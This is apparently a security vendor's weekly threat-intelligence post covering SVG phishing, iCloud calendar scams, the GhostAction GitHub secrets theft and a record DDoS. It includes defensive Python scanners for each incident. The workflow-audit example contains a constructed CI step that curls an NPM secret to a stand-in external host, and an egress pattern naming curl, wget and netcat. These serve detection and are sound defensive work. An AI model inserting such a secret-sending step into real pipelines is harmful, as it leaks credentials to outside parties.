Telesoft | Cyber Security & Threat Intelligence Report | Phishing, Supply Chain, DDoS & SOC Insights
13.09.2025

Essential Weekly Cyber Security & Threat Intelligence – September 14

This week in cyber has seen a rise in sophisticated phishing campaigns, supply chain compromises, and record-breaking DDoS attacks. From malicious SVG files to iCloud calendar abuse, the tactics show how attackers continue to exploit trusted services and overlooked technologies. At the same time, large-scale attacks on GitHub and European network providers highlight the scale and persistence of modern cyber threats, underlining the importance of network detection, SOC monitoring, and proactive threat intelligence.


VirusTotal Uncovers SVG Files Used in Phishing and Malware Campaign

Category: Phishing | Malware Delivery | File Exploitation

VirusTotal identified a phishing campaign using SVG files to impersonate Colombia’s judicial system and distribute malware. By leveraging the <foreignObject> element, attackers embedded HTML and JavaScript within SVGs to create fake portals. Victims were tricked into downloading a password-protected ZIP file, with the password displayed on the fake page.

Traditional antivirus tools failed to detect the malicious files, but VirusTotal’s AI-powered Code Insight flagged their suspicious behaviour.


Threat Intelligence Insight: File types once considered safe are increasingly being weaponised for phishing and malware delivery. Organisations should ensure their SOC monitoring and file scanning solutions extend to non-traditional formats such as SVGs.
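The campaign above turned on a single structural trick: an SVG carrying active content (a `<foreignObject>` wrapping HTML, an embedded `<script>`, inline event handlers) rather than drawing instructions. As an added defender-side example, not code from VirusTotal or the original post, the Python check below parses an SVG and reports exactly those markers, plus `javascript:` and HTML data URIs in `href` attributes. Both sample files are constructed for the check and carry no payload. One caveat for production use: the standard library's ElementTree is not hardened against entity-expansion attacks, so a scanning pipeline should swap in a hardened parser such as defusedxml when the input is untrusted.

```python
"""Flag SVG files that carry active content instead of static drawing instructions.

Added example: looks for the markers described above (foreignObject, script,
inline event handlers, executable href values). A cheap first pass a file
scanner can run on every SVG before deciding whether to detonate it.
"""
import re
import xml.etree.ElementTree as ET

# Elements a static image never needs; foreignObject is the one the campaign used
# to wrap arbitrary HTML inside the SVG.
SUSPICIOUS_TAGS = {"foreignObject", "script", "iframe", "embed", "object"}
# Any attribute named on<event> is an inline script handler (onload, onclick, ...).
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# href values that execute code or smuggle HTML rather than reference an image.
DANGEROUS_HREF = re.compile(r"^\s*(javascript:|data:text/html)", re.IGNORECASE)


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def analyse_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # A file that claims to be SVG but will not parse deserves a look too.
        return [f"parse-error:{exc}"]
    for elem in root.iter():
        name = _local(elem.tag)
        if name in SUSPICIOUS_TAGS:
            findings.append(f"element:{name}")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if EVENT_ATTR.match(aname):
                findings.append(f"event-handler:{aname}")
            elif aname == "href" and DANGEROUS_HREF.match(value):
                findings.append(f"href:{value.strip().split(':', 1)[0].lower()}")
    return findings


# Constructed samples for the check below; neither is a real campaign file.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
</svg>"""

ACTIVE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400" onload="init()">
  <foreignObject width="100%" height="100%">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <p>Lookalike portal text would sit here.</p>
      <script>function init() {}</script>
    </div>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("active", ACTIVE_SVG)):
        print(label, analyse_svg(blob))
```

The check is deliberately structural: it does not try to judge what the script does, only whether an "image" contains code at all, which is the question a mail gateway or file-upload handler needs answered quickly. Feed it every SVG regardless of declared MIME type, since the files in this campaign passed traditional scanners precisely because the format was treated as inert.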


Scammers Use iCloud Calendar Invites to Bypass Email Security

Category: Phishing | Social Engineering | Email Security Bypass

Attackers are exploiting Apple’s iCloud Calendar invites to deliver phishing scams, sending fake PayPal receipts via noreply@email.apple.com. These appear legitimate because they bypass SPF, DKIM, and DMARC filters.

The payload is hidden in the invite’s Notes field, prompting victims to call a fake “support” line where they risk giving attackers remote access or installing malware.


SOC Monitoring Takeaway: This demonstrates how trusted platforms can be abused to evade email filtering. Organisations should extend phishing detection beyond email gateways and educate users to be cautious of unexpected calendar invites or system messages.


Hackers Steal 3,325 Secrets in GhostAction GitHub Supply Chain Attack

Category: Supply Chain Attack | Credential Theft | Developer Security

On September 2nd, GitGuardian researchers discovered GhostAction, a supply chain campaign targeting GitHub Actions workflows. Attackers compromised maintainer accounts and injected malicious workflows to exfiltrate secrets directly from CI/CD environments.

The attack impacted 817 repositories and 327 GitHub users, with 3,325 secrets stolen. Exfiltrated data was sent to a malicious domain before the endpoint was shut down. GitHub, npm, and PyPI were notified, and GitGuardian raised issues across hundreds of affected projects.


Threat Intelligence Note: This campaign highlights the growing risk of software supply chain attacks. Development teams must enforce strong identity protection, workflow integrity checks, and continuous monitoring across GitHub and CI/CD environments.
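Two of the "workflow integrity checks" the note calls for can be automated with plain static analysis of the workflow files themselves. The Python scanner below is an added example, not GitGuardian's or GitHub's tooling: it flags actions referenced by a mutable tag or branch instead of a full commit SHA, and steps that both read `${{ secrets.* }}` and invoke a network client, which is the shape of an exfiltration step. The workflow it runs over is constructed, including the SHA, and `example.invalid` stands in for any unknown host. It parses YAML with regular expressions so it has no dependencies; a secret that is first mapped into `env:` and then used as `$TOKEN` in the shell would slip past the secret regex, so a fuller check should follow those bindings too.

```python
"""Static checks for GitHub Actions workflow files.

Added example. Two checks a CI integrity review can automate: actions pinned to a
mutable ref rather than a commit SHA, and run steps that both read a secret and
reach out to the network.
"""
import re

# A step is a YAML list item whose first key is one of these.
STEP_START = re.compile(r"^\s*-\s+(name|uses|run|id|with|env|if):", re.MULTILINE)
USES_RE = re.compile(r"uses:\s*([\w.-]+/[\w./-]+)@([^\s#]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.[A-Za-z_]\w*\s*\}\}")
EGRESS_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc|ncat)\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def split_steps(text: str) -> list[str]:
    """Cut the workflow into per-step chunks; text before the first step is dropped."""
    starts = [m.start() for m in STEP_START.finditer(text)]
    starts.append(len(text))
    return [text[a:b] for a, b in zip(starts, starts[1:])]


def audit_workflow(text: str, allowed_hosts=frozenset()) -> list[str]:
    """Return findings for one workflow file, in step order."""
    findings = []
    for step in split_steps(text):
        m = USES_RE.search(step)
        if m and not FULL_SHA.match(m.group(2)):
            # Tags and branches can be moved by whoever controls the action repo;
            # only a commit SHA is immutable.
            findings.append(f"unpinned-action:{m.group(1)}@{m.group(2)}")
        if "run:" in step and SECRET_RE.search(step) and EGRESS_RE.search(step):
            hosts = set(URL_RE.findall(step))
            unexpected = hosts - set(allowed_hosts)
            if not hosts:
                # Destination assembled at runtime; still worth a human look.
                findings.append("secret-egress:no-literal-url")
            elif unexpected:
                findings.append("secret-egress:" + ",".join(sorted(unexpected)))
    return findings


# Constructed workflow: one unpinned action, one pinned to a made-up SHA, and a
# publish step that posts a secret to an external host.
SAMPLE_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - name: Test
        run: npm test
      - name: Publish
        run: |
          curl -s -X POST -d "token=${{ secrets.NPM_TOKEN }}" https://example.invalid/collect
"""

if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

Run it in a pre-merge check over `.github/workflows/*.yml` and pass the hosts your pipelines legitimately publish to as `allowed_hosts`; a new finding on a workflow change, especially one arriving under a maintainer account, is the signal this campaign would have produced.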


European DDoS Defender Hit by 1.5 Billion PPS Attack

Category: DDoS | Network Security | Botnet Activity

A European DDoS scrubbing provider was targeted with an unprecedented 1.5 billion packets-per-second (Bpps) attack. The volumetric assault originated from thousands of MikroTik routers and IoT devices spanning more than 11,000 networks worldwide.

The attack, mitigated by FastNetMon, came just days after Cloudflare defended against an 11.5 Tbps / 5.1 Bpps DDoS — underscoring a trend of increasingly hyper-scale denial-of-service campaigns.


Network Detection & Response Lesson: These attacks demonstrate the urgent need for ISP-level detection logic and enterprise adoption of adaptive network detection and response capabilities to defend against large-scale botnet activity.
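The detection logic the lesson points at rests on two signals the 1.5 Bpps attack exhibits at once: a packet rate towards one destination far above baseline, and that rate spread across thousands of sources. The Python sketch below is an added example, not FastNetMon's or Cloudflare's logic, and it works on constructed per-second flow bins scaled down from the real event (a 1.2 million pps flood from 2,000 sources). It reports a destination over the rate threshold as a distributed flood when the source count is also high, and as a single-source burst otherwise, so a misbehaving server is not mistaken for a botnet.

```python
"""Detect a distributed packet flood from per-second flow buckets.

Added example. Combines per-destination packet rate with source diversity,
the two properties that separate a botnet flood from one noisy host.
"""
from collections import defaultdict


def detect_floods(buckets, pps_threshold, min_sources):
    """buckets: iterable of (second, src, dst, packets) records already reduced to 1 s bins.

    Returns {(second, dst): {"pps": int, "sources": int, "verdict": str}} for every
    (second, destination) whose packet rate meets the threshold.
    """
    pkts = defaultdict(int)
    srcs = defaultdict(set)
    for second, src, dst, packets in buckets:
        pkts[(second, dst)] += packets
        srcs[(second, dst)].add(src)

    alerts = {}
    for key, total in pkts.items():
        if total < pps_threshold:
            continue
        n_sources = len(srcs[key])
        verdict = "distributed-flood" if n_sources >= min_sources else "single-source-burst"
        alerts[key] = {"pps": total, "sources": n_sources, "verdict": verdict}
    return alerts


def constructed_sample():
    """Synthetic bins (constructed, not captured): 2,000 sources sending 600 pkt/s
    each to one victim, one host sending 1.5M pkt/s to another, and background."""
    rows = [(0, f"10.{i // 256}.{i % 256}.1", "198.51.100.10", 600) for i in range(2000)]
    rows.append((0, "203.0.113.5", "198.51.100.20", 1_500_000))
    rows.append((0, "192.0.2.7", "198.51.100.30", 400))
    return rows


if __name__ == "__main__":
    for key, alert in detect_floods(constructed_sample(), 1_000_000, 1_000).items():
        print(key, alert)
```

Thresholds belong to the baseline of the link being protected, not to a constant. At the packet rates in this report a per-destination set of source addresses would not fit in memory, so production detectors replace the set with an approximate distinct counter (HyperLogLog or similar) and sample flows rather than count every packet; the decision rule stays the same.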


Analyst Insight

This week’s cyber events highlight how attackers are innovating across multiple fronts:

  • SVG-based phishing campaigns show how creative abuse of overlooked file types can bypass traditional defences.
  • Abuse of Apple’s iCloud Calendar reinforces the trend of attackers exploiting legitimate services to increase trust and bypass filters.
  • GhostAction’s GitHub supply chain compromise demonstrates how vulnerable the software development ecosystem remains to secret theft.
  • DDoS campaigns peaking at 1.5 billion PPS reveal the growing danger of IoT-driven botnets at Internet scale.
  • Enterprises should prioritise SOC monitoring, file scanning across diverse formats, zero-trust vendor controls, and AI-powered network detection and response to stay ahead of these evolving threats.

Protect Your Network Today

Stay ahead of threats with AI-powered detection and SOC monitoring.

➡️ Request a demo and see IntSOC in action.
